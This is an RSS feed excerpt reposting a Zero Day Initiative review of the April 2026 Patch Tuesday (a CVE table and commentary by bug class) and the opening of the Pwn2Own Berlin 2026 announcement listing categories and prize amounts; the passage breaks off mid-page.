  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5892">CVE-2026-5892 *</a></td>
  <td>Chromium: CVE-2026-5892 Insufficient policy enforcement in PWAs</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5893">CVE-2026-5893 *</a></td>
  <td>Chromium: CVE-2026-5893 Race in V8</td>
  <td>Medium</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5894">CVE-2026-5894 *</a></td>
  <td>Chromium: CVE-2026-5894 Inappropriate implementation in PDF</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5895">CVE-2026-5895 *</a></td>
  <td>Chromium: CVE-2026-5895 Incorrect security UI in Omnibox</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5896">CVE-2026-5896 *</a></td>
  <td>Chromium: CVE-2026-5896 Policy bypass in Audio</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5897">CVE-2026-5897 *</a></td>
  <td>Chromium: CVE-2026-5897 Incorrect security UI in Downloads</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5898">CVE-2026-5898 *</a></td>
  <td>Chromium: CVE-2026-5898 Incorrect security UI in Omnibox</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5899">CVE-2026-5899 *</a></td>
  <td>Chromium: CVE-2026-5899 Incorrect security UI in History Navigation</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5900">CVE-2026-5900 *</a></td>
  <td>Chromium: CVE-2026-5900 Policy bypass in Downloads</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5901">CVE-2026-5901 *</a></td>
  <td>Chromium: CVE-2026-5901 Policy bypass in DevTools</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5902">CVE-2026-5902 *</a></td>
  <td>Chromium: CVE-2026-5902 Race in Media</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5903">CVE-2026-5903 *</a></td>
  <td>Chromium: CVE-2026-5903 Policy bypass in IFrameSandbox</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5904">CVE-2026-5904 *</a></td>
  <td>Chromium: CVE-2026-5904 Use after free in V8</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5905">CVE-2026-5905 *</a></td>
  <td>Chromium: CVE-2026-5905 Incorrect security UI in Permissions</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5906">CVE-2026-5906 *</a></td>
  <td>Chromium: CVE-2026-5906 Incorrect security UI in Omnibox</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5907">CVE-2026-5907 *</a></td>
  <td>Chromium: CVE-2026-5907 Insufficient data validation in Media</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5908">CVE-2026-5908 *</a></td>
  <td>Chromium: CVE-2026-5908 Integer overflow in Media</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5909">CVE-2026-5909 *</a></td>
  <td>Chromium: CVE-2026-5909 Integer overflow in Media</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5910">CVE-2026-5910 *</a></td>
  <td>Chromium: CVE-2026-5910 Integer overflow in Media</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5911">CVE-2026-5911 *</a></td>
  <td>Chromium: CVE-2026-5911 Policy bypass in ServiceWorkers</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5912">CVE-2026-5912 *</a></td>
  <td>Chromium: CVE-2026-5912 Integer overflow in WebRTC</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5913">CVE-2026-5913 *</a></td>
  <td>Chromium: CVE-2026-5913 Out of bounds read in Blink</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>Info</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5914">CVE-2026-5914 *</a></td>
  <td>Chromium: CVE-2026-5914 Type Confusion in CSS</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5915">CVE-2026-5915 *</a></td>
  <td>Chromium: CVE-2026-5915 Insufficient validation of untrusted input in WebML</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5918">CVE-2026-5918 *</a></td>
  <td>Chromium: CVE-2026-5918 Inappropriate implementation in Navigation</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5919">CVE-2026-5919 *</a></td>
  <td>Chromium: CVE-2026-5919 Insufficient validation of untrusted input in WebSockets</td>
  <td>Low</td>
  <td>N/A</td>
  <td>No</td>
  <td>No</td>
  <td>SFB</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33118">CVE-2026-33118</a></td>
  <td>Microsoft Edge (Chromium-based) Spoofing Vulnerability</td>
  <td>Low</td>
  <td>4.3</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
</tbody></table>
  
  









  <p class=""><em>* Indicates this CVE had been released by a third party and is now being included in Microsoft releases</em>.</p><p class=""><em>† Indicates further administrative actions are required to fully address the vulnerability.</em></p><p class=""><em> </em></p><p class="">Looking at the other Critical-rated bugs in this month’s release, there are three Office-related bugs where the Preview Pane is once again listed as an exploit vector. I would still like to have a full-proof way of disabling the Preview Pane, but I don’t see that as an option. There’s a bug in the RDP client, but that involves connecting to a malicious RDP server. The bug in Active Directory requires authentication and a network adjacent attacker. The final Critical-rated bug is an interesting DoS in .NET Framework. An unauthenticated attacker could deny service over a network – presumably crippling any affected app made in .NET. You rarely see Critical-rated DoS bugs, but this one deserves the moniker.</p><p class="">Moving on to the other code execution bugs, you have quite a few open-and-own bugs in Office components, most notably Excel, where the Preview Pane is not an attack vector. The bug in SQL Server requires authentication, and as usual, additional steps are needed to ensure you have the correct update to remediate this vulnerability. The two bugs in Hyper-V almost reads like a privilege escalation since it allows unauthorized attackers to execute code locally. That’s the same for the bugs in the Windows Snipping Tool and the UPnP Device host. </p><p class="">More than half of this release addresses Elevation of Privilege (EoP) bugs. However, most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges, so there’s not much to add without further technical details about the bugs themselves. The bugs in SQL Server could allow an attacker to gain SQL sysadmin privileges. One of the kernel bugs simply states an attacker could “elevate privileges locally”. How obtuse. That’s similar for the bug in afd.sys and Desktop Windows Manager, but Microsoft also states that these bugs could crash an affected system. There are several bugs that result in a sandbox escape, including Windows Push Notifications, AFD for Winsock, Management Services, and User Interface Core. Of these, CVE-2026-26167 (Push Notifications) is the most notable — it's the only one with low attack complexity, meaning no race condition needed. The rest all require winning a race condition (AC:H). The bugs in UPnP are interesting as they allow attackers to gain access to a limited set of administrator-protected objects. Not a full escalation but definitely getting access to resources they shouldn’t. The vulnerability in the Brokering File System allows attackers to gain the level of the logged on user, so don’t do your normal activities as a user with admin privileges. The bug in Azure Monitor Agent leads to root-level access. </p><p class="">There are a dozen different security features bypass bugs in the April release. Some of these are obvious by the title alone. For example, the bugs in Windows Hello bypass safety features within the Hello app itself. The bug in the Biometric Service allows attackers to bypass biometric protections. The vulns in BitLocker and Secure Boot bypass protections in those components. The bug in Power Apps allows attackers to bypass a security warning dialog and trick targets into triggering an external protocol call that performs unintended actions on the user’s device. The bug in Windows Shell allows attackers to bypass Mark of the Web (MotW) protections. The bug in PowerShell could almost be described as a code execution bug as exploiting it bypasses dynamic-expression security checks, which could result in code execution. The vulnerability in the Windows Recovery Environment allows local attackers to bypass BitLocker device encryption. Finally, the bug in Virtualization‑Based Security (VBS) is the most interesting of the bunch – and not just because VBS is a (relatively) new feature. The problem allows attackers to manipulate allow a compromised Windows kernel to modify memory belonging to the secure kernel, breaking the intended isolation guarantees provided by VBS. Somewhat of a sandbox escape, but this time, you’re escaping from Virtual Trust Level 0 (VTL0) to Virtual Trust Level 1 (VTL1). Neat.</p><p class="">Moving on to the Information Disclosure bugs fixed this month, we have 20 different CVEs. Fortunately, most of these simply result in info leaks consisting of unspecified memory contents or memory addresses. While useful in crafting exploits, they aren’t exactly exciting on their own. There are also several bugs that disclose addresses from an object a contained in a sandboxed execution environment. This includes bugs in the Print Spooler, Package Catalog, and Web Account Manager. The bug in Dynamics 365 discloses the ever ineffable “sensitive information”. There are three different info disclosure bugs in UPnP. Two allow an attacker to read from the file system, while the third discloses anything available to the LOCAL SERVICE account. The final info disclosure bug resides in Copilot and Visual Studio and allows attackers to disclose the contents of the Model Context Protocol (MCP) when using Copilot. There are those who think MCP is dead (thanks to agentic AI agents), but if you’re using a custom MCP, I doubt you would want it leaked.</p><p class="">The April release contains just a handful of Spoofing bugs. Some, like the bugs in .NET, Active Directory, and Windows Shell, just say that they allow spoofing over a network. Others, like the bug in Windows Snipping Tool, say similar but also note that it could be used to relay NTLMv2 hashes. The patch for RDP <a href="https://go.microsoft.com/fwlink/?linkid=2347342">notes</a> that there are new warning dialogs coming this month. The bug in the Windows Admin Center would allow an attacker to interact with other tenant’s applications and content. Finally, the spoofing bug in SharePoint is another XSS issue.</p><p class="">There are eight DoS bugs in the April release, but as always, Microsoft provides no actionable information about the vulnerabilities. Microsoft does offer a mitigation for the http.sys bug that can be applied while you test and deploy the patch, but I would rely on the patch rather than the mitigation. Another exception is the bug for Connected User Experiences and Telemetry Service, which allows attackers to deny service locally rather than over the network.</p><p class="">The final(!) bug in the April release is a Tampering bug in WSUS that reads like a DoS. According to Microsoft, “An attacker can send specially crafted packets which could affect availability of the service and result in Denial of Service (DoS).” But sure – let’s call it Tampering. </p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">I will be in Berlin for the next Patch Tuesday, which will be May 12, and I’ll provide my full thoughts then on what will hopefully be a smaller release than this one. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Announcing Pwn2Own Berlin for 2026]]></title>
<description><![CDATA[If you just want to read the contest rules, click here. Willkommen zurück, meine Damen und Herren, zu unserem zweiten Wettbewerb in Berlin! That’s correct (if Google translate didn’t steer me wrong). After our inaugural competition last year, Pwn2Own returns to Berlin and OffensiveCon. Outside of...]]></description>
<link>https://tsecurity.de/de/3694471/it-security-nachrichten/announcing-pwn2own-berlin-for-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694471/it-security-nachrichten/announcing-pwn2own-berlin-for-2026/</guid>
<pubDate>Sat, 25 Jul 2026 19:00:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class=""><em>If you just want to read the contest rules, click </em><a href="https://www.zerodayinitiative.com/Pwn2OwnBerlin2026Rules.html" target="_blank"><em>here</em></a><em>.</em></p><p class=""> </p><p class="">Willkommen zurück, meine Damen und Herren, zu unserem zweiten Wettbewerb in Berlin! That’s correct (if Google translate didn’t steer me wrong). After our inaugural competition last year, Pwn2Own returns to Berlin and <a href="https://www.offensivecon.org/" target="_blank">OffensiveCon</a>. Outside of our <a href="https://www.youtube.com/shorts/Xj9Du8iuXCw" target="_blank">shipping troubles</a>, we had an amazing time and can’t wait to get back.</p><p class="">Last year, we added <strong>Artificial Intelligence</strong> as a category with great results. This year, we’re expanding this and splitting it into multiple different categories: AI Databases, Coding Agents, Local Inferences, and a separate category for NVIDIA products. In last year’s contest, NVIDIA targets had wins, losses, and collisions, so it will be interesting to see how they fare this year. The folks from <strong>AWS </strong>wanted to get into the fray as well, so they stepped up to co-sponsor this year’s event, which allows us to increase the reward for bugs in Firecracker. Of course, we have all of the returning categories as well, including web browsers, containers, servers, virtualization, and operating systems. There’s more than $1,000,000 in cash and prizes available for contestants. Last year, we awarded $1,078,750 for 28 unique 0-days over the three-day event. We’ll see if we can eclipse those numbers in 2026.</p><p class="">The contest begins on May 14, but registration closes on May 7, so don’t delay in getting those submissions in. We’re hoping for maximum participation, so set aside your vibe coding and show us what you can really do. We’re looking forward to some cutting-edge exploitation on display. For 2026, we have a total of 31 targets across 10 categories. Here is a full list of the categories for this year’s event:  </p>





















  
  



<p><a data-preserve-html-node="true" name="top"></a> 
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#virtual">-- Virtualization</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#browser">-- Web Browser</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#entapps">-- Enterprise Applications</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#server">-- Servers</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#eop">-- Local Escalation of Privilege</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#container">-- Containers</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#aidb">-- AI Database</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#aicode">-- Coding Agents</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#ailocal">-- Local Inference</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#nvidia">-- NVIDIA</a>  </p>




  <p class="">Of course, no Pwn2Own competition would be complete without us crowning a Master of Pwn (Meister von Pwn?). Since the order of the contest is decided by a random draw, contestants with an unlucky draw could still demonstrate fantastic research but receive less money since subsequent rounds go down in value. However, the points awarded for each unique, successful entry do <em>not</em> go down. Someone could have a bad draw and still accumulate the most points. The person or team with the most points at the end of the contest will be crowned Master of Pwn, receive 65,000 ZDI reward points (enough for <a href="https://www.zerodayinitiative.com/about/benefits/" target="_blank">Platinum</a> status), a killer <a href="https://static1.squarespace.com/static/5894c269e4fcb5e65a1ed623/t/5b8993b321c67c67b886f506/1535742910114/trophy.jpg" target="_blank">trophy</a>, and a <a href="https://pbs.twimg.com/media/C6Z5iQQXEAEPQ0Q.jpg" target="_blank">pretty</a> <a href="https://pbs.twimg.com/media/DNhpw_xUEAEkEwG.jpg" target="_blank">snazzy</a> <a href="https://pbs.twimg.com/media/Cu-6uFSWcAEefBS.jpg" target="_blank">jacket</a> to boot.</p><p class="">Let's look at the details of the rules for this year's event.</p>





















  
  



<p><a data-preserve-html-node="true" name="virtual"></a>  </p>
<p><b data-preserve-html-node="true">Virtualization Category</b> </p>




  <p class="">Some of the highlights for each contest can be found in the Virtualization Category, and we’re thrilled to see what this year’s event could bring with it. As usual, VMware is the main highlight of this category as we’ll have VMware ESXi return with an award of $150,000. Last year produced the first ESXi exploits in Pwn2Own history, so it will be interesting to see if we get more. Microsoft also returns as a target and leads the virtualization category with a $250,000 award for a successful Hyper-V Client guest-to-host escalation. Kernel-based Virtual Machine (KVM) is our final target in this category with a prize of $50,000.</p><p class="">There’s an add-on bonus in this category as well. If a contestant can escape the guest OS, then gain arbitrary code execution on the virtualization target <em>and</em> obtain arbitrary code execution in the guest operating system on a separate virtual machine managed by the same targeted virtualization target, they’ll earn another $50,000. That could push the payout on a ESXi bug to $200,000. This bonus is for KVM and ESXi only. Here’s a detailed look at the targets and available payouts in the Virtualization category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f1a17b36-ce06-47c8-8e58-3435b9bbdcc4/Slide1.jpeg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f1a17b36-ce06-47c8-8e58-3435b9bbdcc4/Slide1.jpeg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f1a17b36-ce06-47c8-8e58-3435b9bbdcc4/Slide1.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f1a17b36-ce06-47c8-8e58-3435b9bbdcc4/Slide1.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f1a17b36-ce06-47c8-8e58-3435b9bbdcc4/Slide1.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f1a17b36-ce06-47c8-8e58-3435b9bbdcc4/Slide1.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f1a17b36-ce06-47c8-8e58-3435b9bbdcc4/Slide1.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f1a17b36-ce06-47c8-8e58-3435b9bbdcc4/Slide1.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f1a17b36-ce06-47c8-8e58-3435b9bbdcc4/Slide1.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="browser"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">Web Browser Category</b></p>




  <p class="">While browsers are the “traditional” Pwn2Own target, we’re continuously tweaking the targets in this category to ensure they remain relevant. We re-introduced renderer-only exploits a couple of years ago, and this year, we’ve increased the award to $75,000. In fact, we’ve increased the awards across the board for this category. Here’s a detailed look at the targets and available payouts:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d9ee752e-7f62-440b-818a-55fd6d94a2f0/Slide2.jpeg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d9ee752e-7f62-440b-818a-55fd6d94a2f0/Slide2.jpeg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d9ee752e-7f62-440b-818a-55fd6d94a2f0/Slide2.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d9ee752e-7f62-440b-818a-55fd6d94a2f0/Slide2.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d9ee752e-7f62-440b-818a-55fd6d94a2f0/Slide2.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d9ee752e-7f62-440b-818a-55fd6d94a2f0/Slide2.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d9ee752e-7f62-440b-818a-55fd6d94a2f0/Slide2.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d9ee752e-7f62-440b-818a-55fd6d94a2f0/Slide2.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d9ee752e-7f62-440b-818a-55fd6d94a2f0/Slide2.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="entapps"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">Enterprise Applications Category</b></p>




  <p class="">Enterprise applications return as targets with Adobe Reader and various Office components on the target list once again. Attempts in this category must be launched from the target under test. For example, launching the target under test from the command line is not allowed. Prizes in this category run from $50,000 for a Reader exploit with a sandbox escape or a Reader exploit with a kernel privilege escalation, and $150,000 for an Office 365 application. Word, Excel, and PowerPoint are all valid targets. Microsoft Office-based targets will have Protected View enabled where applicable. Adobe Reader will have Protected Mode enabled where applicable.</p><p class="">This year, we’re adding a bonus for Copilot data exfiltration and Copilot action execution. Microsoft just <a href="https://x.com/thezdi/status/2031496424488042681" target="_blank">patched</a> a bug like this in Excel, so we know they are out there. If you’re able to exploit Copilot in addition to a Microsoft application, you’ll earn an additional $50,000. There are quite a few rules and scenarios around this add-on, so be sure to read the rules carefully and contact us with questions. Here’s a detailed view of the targets and payouts in the Enterprise Application category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad7c5b03-1001-43ce-9144-be06b43ef9f6/entapps.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad7c5b03-1001-43ce-9144-be06b43ef9f6/entapps.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad7c5b03-1001-43ce-9144-be06b43ef9f6/entapps.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad7c5b03-1001-43ce-9144-be06b43ef9f6/entapps.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad7c5b03-1001-43ce-9144-be06b43ef9f6/entapps.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad7c5b03-1001-43ce-9144-be06b43ef9f6/entapps.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad7c5b03-1001-43ce-9144-be06b43ef9f6/entapps.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad7c5b03-1001-43ce-9144-be06b43ef9f6/entapps.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad7c5b03-1001-43ce-9144-be06b43ef9f6/entapps.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="server"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">The Server Category</b></p>




  <p class="">The Server Category for 2026 focuses solely on the server components we’re most interested in. These servers are often targeted by everyone from ransomware crews to nation/state actors, so we know there are exploits out there for them. The only question is whether we’ll see any of the competitors bring one of those exploits to Pwn2Own. Last year, the bugs demonstrated in SharePoint ended up being exploited in the wild, so we know people are looking for these with great interest. Microsoft Exchange has been a popular target for some time, and it returns as a target this year as well, with a payout of $200,000. This category is rounded out by Microsoft Windows RDP/RDS, which also has a payout of $200,000. Here’s a detailed look at the targets and payouts in the Server category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/278211ce-a1e8-4258-b593-3faca48002e5/Slide4.jpeg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/278211ce-a1e8-4258-b593-3faca48002e5/Slide4.jpeg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/278211ce-a1e8-4258-b593-3faca48002e5/Slide4.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/278211ce-a1e8-4258-b593-3faca48002e5/Slide4.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/278211ce-a1e8-4258-b593-3faca48002e5/Slide4.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/278211ce-a1e8-4258-b593-3faca48002e5/Slide4.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/278211ce-a1e8-4258-b593-3faca48002e5/Slide4.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/278211ce-a1e8-4258-b593-3faca48002e5/Slide4.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/278211ce-a1e8-4258-b593-3faca48002e5/Slide4.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="eop"></a>
